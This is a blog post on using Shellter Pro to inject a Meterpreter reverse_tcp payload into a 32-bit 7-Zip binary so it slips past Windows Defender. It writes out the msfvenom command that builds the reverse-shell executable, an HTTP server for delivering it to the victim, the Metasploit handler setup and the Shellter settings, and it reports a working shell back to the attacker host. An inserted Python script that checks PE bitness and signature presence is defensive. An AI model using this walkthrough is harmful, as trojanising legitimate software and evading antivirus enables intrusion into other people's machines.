Using Shellter Pro for dynamic shellcode injection
--
I have decided to move my original blog over to Medium for ease of use, so here is an entry I did a while ago on how to use Shellter Pro for dynamic shellcode injection on https://dmzero.net
We are going to use Shellter Pro's auto-mode to inject a listed payload, "windows/meterpreter/reverse_tcp", into an alpha version of 7-Zip. The file we use has to be 32-bit, since there is no support for 64-bit applications at the time of writing. One thing to note about using this tool to infect legitimate PEs is that you have to pick an application that is not already flagged by AV for any reason.
What tends to happen is that once multiple users start using the same PE for infection and the files get uploaded to services like VirusTotal, the detection rates go up. If you are testing this out, I suggest you find a lightweight application and check whether there are any detections on the file before proceeding. Some of the other articles I am planning to write will cover more advanced capabilities of the tool: chaining multiple payloads, custom shellcode, and various other options available within it.
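Since the host PE must be 32-bit and, from the defender's side, a tampered copy of a vendor binary loses its Authenticode signature, here is an added example (not part of the original post or of Shellter) that reads the PE headers to report the machine type, bitness, and whether a security (Authenticode) directory is present. The `build_minimal_pe` helper constructs header-only sample bytes for testing; real verification of a signature still needs a tool such as `Get-AuthenticodeSignature`, which this script does not replace.

```python
import struct

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # index of the Authenticode data directory

def pe_summary(data: bytes) -> dict:
    """Parse DOS/COFF/optional headers and summarise architecture and signature presence."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    opt = e_lfanew + 24                      # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                        # PE32
        bits, dd_off = 32, opt + 96
    elif magic == 0x20B:                      # PE32+
        bits, dd_off = 64, opt + 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    num_rva = struct.unpack_from("<I", data, dd_off - 4)[0]
    sec_off = sec_size = 0
    if num_rva > IMAGE_DIRECTORY_ENTRY_SECURITY:
        # For the security directory the first field is a raw file offset, not an RVA.
        sec_off, sec_size = struct.unpack_from("<II", data, dd_off + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
    names = {IMAGE_FILE_MACHINE_I386: "i386", IMAGE_FILE_MACHINE_AMD64: "amd64"}
    return {"machine": names.get(machine, f"{machine:#06x}"), "bits": bits,
            "signed": sec_size > 0, "security_dir": (sec_off, sec_size)}

def build_minimal_pe(machine: int, pe32plus: bool, sec_size: int = 0) -> bytes:
    """Constructed sample: headers only, enough for pe_summary(); not a loadable executable."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    opt_size = 240 if pe32plus else 224       # standard sizes with 16 data directories
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    nrva_off = 108 if pe32plus else 92
    struct.pack_into("<I", opt, nrva_off, 16)
    dd = nrva_off + 4 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
    struct.pack_into("<II", opt, dd, 0x1000 if sec_size else 0, sec_size)
    return dos + b"PE\0\0" + coff + bytes(opt)

if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as f:
        print(pe_summary(f.read()))
```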
Lab setup
- Windows 10 Victim — Patched & Running Windows Defender
- Kali Linux waiting to receive shellz
- Shellter
Before we start, let's run a quick test to see if Defender is actually able to catch our very basic, generic payload. This is something that should be picked up by many AV vendors; in later blogs we will also explore how you can take a payload like this and use various techniques to make it slip through.
First things first, let's generate a generic EXE file with MSFVenom to showcase this:
//msfvenom to generate exe
~/msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe
After this, the simplest way to move the file over is by hosting an HTTP server that the victim can download the file from:
//HTTP server setup
~/python -m SimpleHTTPServer 80
We also need to set up our listener on our attacker host:
//msfconsole for our session
~/msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport 443
And as expected Windows Defender saves the day :)
The idea now is to try some of the magic that Shellter has to offer. We are going to use the standard settings that are available within the tool and see how injecting the same payload gets past Windows Defender.
//Shellter Pro using default configuration
1. Put Shellter in Automatic mode
2. Check online for updates
3. Select PE - 7zip renamed to 1.exe for ease
4. Turn on stealth mode
5. For the remaining prompts, use the basic features that ship with the tool
Now that we have our malicious file ready for execution let’s see how Windows Defender handles this. We will copy the file over to our victim machine and execute it.
We use the same configuration for our Metasploit handler:
//msfconsole for our session
~/msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport 443
As we can see from the above, the 7zip application functions as expected, and we receive a fully interactive meterpreter shell back to the attacker host :)
That's it for this entry. In some of the future blogs we will look at how some of the more advanced AV products hold up against this type of attack.